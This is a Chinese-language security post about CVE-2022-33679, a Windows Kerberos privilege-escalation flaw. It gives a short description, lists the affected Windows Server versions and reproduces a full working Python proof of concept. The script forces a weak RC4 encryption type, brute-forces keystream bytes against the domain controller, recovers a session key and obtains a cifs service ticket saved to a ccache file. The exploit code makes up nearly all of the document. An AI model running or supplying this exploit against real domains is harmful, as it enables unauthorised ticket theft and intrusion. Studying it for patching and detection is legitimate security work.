【CVE-2022-33679】Microsoft Windows Kerberos 安全漏洞POC
作者:Sec-Labs | 发布时间:
漏洞介绍
Microsoft Windows Kerberos是美国微软(Microsoft)公司的一个用于在网络集群中进行身份验证的软件。Kerberos 同时作为一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。
Microsoft Windows Kerberos存在权限提升漏洞(CVE-2022-33679)。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2,Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation)。
项目地址
https://github.com/Bdenneu/CVE-2022-33679
POC
CVE-2022-33679.py
import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
# The ccache module exposes the key-block structure under one of two names;
# try ``KeyBlockV4`` first and fall back to ``KeyBlock`` when it is absent.
# Only an ImportError triggers the fallback, so unrelated failures surface.
try:
    from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except ImportError:
    from impacket.krb5.ccache import KeyBlock
from arc4 import ARC4
# Module-wide random source used for request nonces.  Prefer the OS-backed
# generator; fall back to the default ``random`` module if it is reported as
# not implemented on this platform.
try:
    rand = random.SystemRandom()
except NotImplementedError:
    rand = random
class TGTBrute:
    """Drive the AS-REQ / TGS-REQ exchange implemented by this script.

    The object builds AS-REQ messages that offer a single encryption type
    (``-128``, called ``rsadsi_rc4_md4`` in this file), extends a keystream
    one byte at a time by replaying encrypted-timestamp pre-authentication
    requests, derives a session key from it, requests a ``cifs/<server>``
    service ticket and stores that ticket in a ccache file.

    All state is kept on the instance; nothing here depends on module-level
    variables other than the shared ``rand`` random source.
    """

    # Encryption type number placed in every request built by this class.
    _RSADSI_RC4_MD4 = -128
    # Number of leading bytes that precede the DER payload in every RC4 blob
    # handled here: zero-filled when encrypting, skipped when decrypting.
    _PREFIX_LEN = 24
    # Ciphertext bytes RecoverKey needs: 45 known-plaintext bytes plus the
    # 5 bytes that are XORed with the recovered keystream to form the key.
    _MIN_ASREP_CIPHER_LEN = 50

    def __init__(self, target, domain, servername, options):
        """Store the request parameters.

        :param target: user name the tickets are requested for.
        :param domain: Kerberos realm / domain name (must not be empty).
        :param servername: host part of the ``cifs/<servername>`` service.
        :param options: parsed command-line namespace; only ``dc_ip`` is read.
        """
        self.__user = target
        self.__domain = domain
        self.__servername = servername
        self.__options = options
        self.__kdcHost = options.dc_ip
        self.__asReq = None
        self.__reqBody = None
        self.__encodedPacRequest = None

    @staticmethod
    def _utcNow():
        """Return the current UTC time as a timezone-aware ``datetime``."""
        return datetime.datetime.now(datetime.timezone.utc)

    @staticmethod
    def _xor(left, right):
        """Return the byte-wise XOR of two byte strings.

        The result is as long as the shorter argument.
        """
        return bytes(a ^ b for a, b in zip(left, right))

    @classmethod
    def _encTsPlaintext(cls, timestamp, longFormPad=None):
        """Build the plaintext sent as an encrypted timestamp.

        Layout: ``_PREFIX_LEN`` zero bytes, a SEQUENCE (0x30) header, a
        context tag 0 (0xa0) header, a GeneralizedTime (0x18) header and the
        timestamp bytes.  Every declared length is one byte larger than the
        data supplied here, because the caller appends one more (guessed)
        byte after encryption.

        :param timestamp: ASCII KerberosTime bytes.
        :param longFormPad: ``None`` encodes the SEQUENCE length in short
            form (one byte).  An integer ``j`` encodes it in long form as
            ``0x81 + j`` followed by ``j`` zero bytes and the length byte,
            which makes the plaintext ``j + 1`` bytes longer.
        :returns: the plaintext as ``bytes``.
        """
        declared = len(timestamp) + 1
        if longFormPad is None:
            seqHeader = bytes([0x30, declared + 4])
        else:
            seqHeader = (bytes([0x30, 0x81 + longFormPad])
                         + bytes(longFormPad)
                         + bytes([declared + 4]))
        inner = bytes([0xa0, declared + 2, 0x18, declared])
        return bytes(cls._PREFIX_LEN) + seqHeader + inner + timestamp

    def _guessNextByte(self, keystream, plaintext):
        """Find the trailing ciphertext byte that makes a request succeed.

        ``plaintext`` is XORed with the known ``keystream``; each of the 256
        possible values is appended in turn and submitted via ``sendEncTs``.

        :returns: the first accepted byte value, or ``None`` if none is.
        """
        prefix = self._xor(plaintext, keystream)
        for guess in range(256):
            if self.sendEncTs(prefix + bytes([guess])):
                return guess
        return None

    def prepareAsReq(self, requestPAC=True):
        """(Re)build the AS-REQ skeleton on ``self``.

        Populates the request header, the request body and the encoded
        PA-PAC-REQUEST value; pre-authentication data is added by callers.

        :param requestPAC: value stored in the ``include-pac`` field.
        :raises Exception: if the configured domain is empty.
        """
        domain = self.__domain.upper()
        # Validate before the domain is used to build any principal.
        if domain == '':
            raise Exception('Empty Domain not allowed in Kerberos')

        self.__asReq = AS_REQ()

        serverName = Principal('krbtgt/%s' % domain,
                               type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        userName = Principal(self.__user,
                             type=constants.PrincipalNameType.NT_PRINCIPAL.value)

        pacRequest = KERB_PA_PAC_REQUEST()
        pacRequest['include-pac'] = requestPAC
        self.__encodedPacRequest = encoder.encode(pacRequest)

        self.__asReq['pvno'] = 5
        self.__asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)

        self.__reqBody = seq_set(self.__asReq, 'req-body')

        opts = [
            constants.KDCOptions.forwardable.value,
            constants.KDCOptions.renewable.value,
            constants.KDCOptions.proxiable.value,
        ]
        self.__reqBody['kdc-options'] = constants.encodeFlags(opts)

        seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
        seq_set(self.__reqBody, 'cname', userName.components_to_asn1)

        # Ticket end time and renew time are both set to one day from now.
        expiry = self._utcNow() + datetime.timedelta(days=1)
        self.__reqBody['realm'] = domain
        self.__reqBody['till'] = KerberosTime.to_asn1(expiry)
        self.__reqBody['rtime'] = KerberosTime.to_asn1(expiry)
        self.__reqBody['nonce'] = rand.getrandbits(31)

        # Only one encryption type is offered.
        supportedCiphers = (self._RSADSI_RC4_MD4,)
        seq_set_iter(self.__reqBody, 'etype', supportedCiphers)

    def getTGT(self, requestPAC=True):
        """Send an AS-REQ carrying only a PAC request and return the reply.

        :param requestPAC: forwarded to ``prepareAsReq``.
        :returns: the raw reply returned by ``sendReceive``.
        :raises KerberosError: for any KDC error other than
            ``KDC_ERR_ETYPE_NOSUPP``; that one is logged and the process
            exits with status 1.
        """
        self.prepareAsReq(requestPAC)

        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest

        # Original note: "Add padding for more known bytes".  Twenty host
        # addresses 0.0.0.0 .. 0.0.0.19 are attached to the request body.
        for i in range(20):
            addr = HostAddress()
            addr['addr-type'] = 1
            addr['address'] = bytes([0, 0, 0, i])
            self.__reqBody['addresses'][i] = addr

        message = encoder.encode(self.__asReq)

        try:
            r = sendReceive(message, self.__domain, self.__kdcHost)
        except KerberosError as e:
            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                logging.error(" RC4 is not supported")
                sys.exit(1)
            raise
        return r

    def sendEncTs(self, data, requestPAC=True):
        """Submit ``data`` as PA-ENC-TIMESTAMP and report whether it passed.

        :param data: ciphertext placed verbatim in the ``cipher`` field.
        :param requestPAC: forwarded to ``prepareAsReq``.
        :returns: ``True`` if ``sendReceive`` returned normally, ``False``
            if it raised ``KerberosError``.  Any other exception (for
            example a transport failure) propagates, so it cannot be
            mistaken for a rejected guess.
        """
        self.prepareAsReq(requestPAC)

        encryptedData = EncryptedData()
        encryptedData['etype'] = self._RSADSI_RC4_MD4
        encryptedData['cipher'] = data
        encodedEncryptedData = encoder.encode(encryptedData)

        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
        self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData

        self.__asReq['padata'][1] = noValue
        self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest

        message = encoder.encode(self.__asReq)

        try:
            sendReceive(message, self.__domain, self.__kdcHost)
        except KerberosError:
            return False
        return True

    def RecoverKey(self, encryptedAsREP):
        """Derive the 16-byte session key from the encrypted AS-REP part.

        Steps, as implemented:

        1. XOR the first 45 ciphertext bytes with a fixed 45-byte plaintext
           template to obtain the initial keystream.
        2. Extend the keystream by five bytes, one per round, using
           ``_guessNextByte`` with progressively longer timestamp plaintexts.
        3. XOR ciphertext bytes 45..49 with those five keystream bytes and
           append eleven ``0xab`` bytes.

        :param encryptedAsREP: ``bytes`` of the AS-REP ``enc-part`` cipher.
        :returns: the 16-byte key.
        :raises ValueError: if fewer than 50 ciphertext bytes are supplied.

        Logs an error and exits with status 1 if a round finds no byte.
        """
        if len(encryptedAsREP) < self._MIN_ASREP_CIPHER_LEN:
            raise ValueError('Encrypted AS-REP part is too short (%d bytes, need %d)'
                             % (len(encryptedAsREP), self._MIN_ASREP_CIPHER_LEN))

        # Plaintext template for the start of the encrypted part, taken
        # unchanged from the original script (24 zero bytes + 21 header bytes).
        AsREPPlain = bytes(self._PREFIX_LEN) + b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'
        knownLen = len(AsREPPlain)
        RC4Flow = self._xor(AsREPPlain, encryptedAsREP)

        # The same timestamp is reused for every round.
        Timestamp = KerberosTime.to_asn1(self._utcNow()).encode()

        # Round 0 uses the short-form length; rounds 1..4 use long-form
        # lengths padded with 0..3 zero bytes, each one byte longer.
        plaintexts = [self._encTsPlaintext(Timestamp)]
        plaintexts.extend(self._encTsPlaintext(Timestamp, pad) for pad in range(4))

        for index, plaintext in enumerate(plaintexts):
            guess = self._guessNextByte(RC4Flow, plaintext)
            if guess is None:
                logging.error("No matching byte")
                sys.exit(1)
            # The accepted byte is appended to the keystream as-is.
            RC4Flow += bytes([guess])
            logging.info("Byte %d: %02x", index, guess)

        recovered = self._xor(RC4Flow[knownLen:knownLen + 5],
                              encryptedAsREP[knownLen:knownLen + 5])
        return recovered + b'\xab' * 11

    def TGTtoTGS(self, TGT, sessionKey):
        """Request a ``cifs/<servername>`` service ticket using ``TGT``.

        :param TGT: decoded AS-REP (provides ``ticket``, ``crealm``, ``cname``).
        :param sessionKey: key from ``RecoverKey``; its first 8 bytes key the
            RC4 cipher that encrypts the authenticator.
        :returns: the raw TGS reply returned by ``sendReceive``.
        """
        serverName = Principal('cifs/%s' % self.__servername,
                               type=constants.PrincipalNameType.NT_SRV_INST.value)

        ticket = TTicket()
        ticket.from_asn1(TGT['ticket'])

        apReq = AP_REQ()
        apReq['pvno'] = 5
        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

        # No AP options are set.
        opts = list()
        apReq['ap-options'] = constants.encodeFlags(opts)
        seq_set(apReq, 'ticket', ticket.to_asn1)

        authenticator = Authenticator()
        authenticator['authenticator-vno'] = 5
        authenticator['crealm'] = TGT['crealm'].asOctets()

        clientName = Principal()
        clientName.from_asn1(TGT, 'crealm', 'cname')

        seq_set(authenticator, 'cname', clientName.components_to_asn1)

        now = self._utcNow()
        authenticator['cusec'] = now.microsecond
        authenticator['ctime'] = KerberosTime.to_asn1(now)

        encodedAuthenticator = encoder.encode(authenticator)

        # Encrypt the zero-filled prefix followed by the authenticator.
        cipher = ARC4(sessionKey[:8])
        encryptedEncodedAuthenticator = cipher.encrypt(bytes(self._PREFIX_LEN) + encodedAuthenticator)

        apReq['authenticator'] = noValue
        apReq['authenticator']['etype'] = self._RSADSI_RC4_MD4
        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

        encodedApReq = encoder.encode(apReq)

        tgsReq = TGS_REQ()
        tgsReq['pvno'] = 5
        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
        tgsReq['padata'] = noValue
        tgsReq['padata'][0] = noValue
        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
        tgsReq['padata'][0]['padata-value'] = encodedApReq

        reqBody = seq_set(tgsReq, 'req-body')

        opts = [
            constants.KDCOptions.forwardable.value,
            constants.KDCOptions.renewable.value,
            constants.KDCOptions.renewable_ok.value,
            constants.KDCOptions.canonicalize.value,
        ]
        reqBody['kdc-options'] = constants.encodeFlags(opts)
        seq_set(reqBody, 'sname', serverName.components_to_asn1)
        # Use the instance's domain rather than a module-level variable.
        reqBody['realm'] = self.__domain

        expiry = self._utcNow() + datetime.timedelta(days=1)
        reqBody['till'] = KerberosTime.to_asn1(expiry)
        reqBody['nonce'] = rand.getrandbits(31)
        seq_set_iter(reqBody, 'etype',
                     (
                         int(constants.EncryptionTypes.rc4_hmac.value),
                         int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
                         int(constants.EncryptionTypes.des_cbc_md5.value),
                     )
                     )

        message = encoder.encode(tgsReq)
        r = sendReceive(message, self.__domain, self.__kdcHost)
        return r

    def TGSToCCache(self, TGS, sessionKey):  # from CCache.fromTGT
        """Build a ``CCache`` holding the service ticket from ``TGS``.

        :param TGS: decoded TGS-REP.
        :param sessionKey: key from ``RecoverKey``; its first 8 bytes key the
            RC4 cipher that decrypts the reply's encrypted part.
        :returns: a ``CCache`` with one header and one credential.
        """
        ccache = CCache()

        ccache.headers = []
        header = Header()
        header['tag'] = 1
        header['taglen'] = 8
        header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
        ccache.headers.append(header)

        tmpPrincipal = Principal()
        tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
        ccache.principal = CPrincipal()
        ccache.principal.fromPrincipal(tmpPrincipal)

        # Now let's add the credential
        encryptedTGSREP = bytes(TGS['enc-part']['cipher'])

        cipher = ARC4(sessionKey[:8])
        # Skip the leading prefix bytes before DER-decoding the payload.
        plainText = cipher.decrypt(encryptedTGSREP)[self._PREFIX_LEN:]

        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]

        credential = Credential()
        server = Principal()
        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
        tmpServer = CPrincipal()
        tmpServer.fromPrincipal(server)

        credential['client'] = ccache.principal
        credential['server'] = tmpServer
        credential['is_skey'] = 0

        credential['key'] = KeyBlock()
        credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
        credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
        credential['key']['keylen'] = len(credential['key']['keyvalue'])

        credential['time'] = Times()
        credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
        credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
        credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
        # after kb4586793 for cve-2020-17049 this timestamp may be omitted
        if encTGSRepPart['renew-till'].hasValue():
            credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))

        flags = ccache.reverseFlags(encTGSRepPart['flags'])
        credential['tktflags'] = flags

        credential['num_address'] = 0

        credential.ticket = CountedOctetString()
        credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
        credential.ticket['length'] = len(credential.ticket['data'])
        credential.secondTicket = CountedOctetString()
        credential.secondTicket['data'] = b''
        credential.secondTicket['length'] = 0
        ccache.credentials.append(credential)
        return ccache

    def run(self):
        """Run the whole flow and save ``<user>_<servername>.ccache``."""
        logging.info("Getting TGT - Retrieving AS-REP")
        tgt = self.getTGT()
        decodedtgt = decoder.decode(tgt, asn1Spec=AS_REP())[0]
        encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])

        logging.info("Trying to recover the RC4 Flow")
        sessionKey = self.RecoverKey(encryptedAsREP)
        logging.info("Recovered Session key: %s", sessionKey.hex())

        TGS = self.TGTtoTGS(decodedtgt, sessionKey)
        logging.info("Got TGS for %s", self.__servername)
        decodedtgs = decoder.decode(TGS, asn1Spec=TGS_REP())[0]

        ccache = self.TGSToCCache(decodedtgs, sessionKey)
        ccacheName = self.__user + '_' + self.__servername + '.ccache'
        logging.info("Saving ticket in %s", ccacheName)
        ccache.saveFile(ccacheName)
# Process command-line arguments.
if __name__ == '__main__':
    print(version.BANNER)

    # The two description fragments are concatenated by the parser, so the
    # first one must end with a space.
    parser = argparse.ArgumentParser(add_help=True, description="Retrieve a TGT for a user having "
                                     "'Do not require Kerberos preauthentication' set and export their TGS of the given server")

    parser.add_argument('target', action='store', help='domain/username')
    parser.add_argument('serverName', action='store', help='server name')
    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')
    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
                                                                            'ommited it use the domain part (FQDN) '
                                                                            'specified in the target parameter')

    options = parser.parse_args()

    # Init the example's logger theme
    logger.init(options.ts)

    if options.debug:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    # The password component of the target string is parsed but not used.
    domain, username, password = parse_credentials(options.target)

    if domain == '':
        logging.critical('Domain should be specified!')
        sys.exit(1)

    try:
        executer = TGTBrute(username, domain, options.serverName, options)
        executer.run()
    except Exception as e:
        # Full traceback only at debug level; a one-line message otherwise.
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))
        # Report failure to the caller, matching the missing-domain path.
        sys.exit(1)
截图
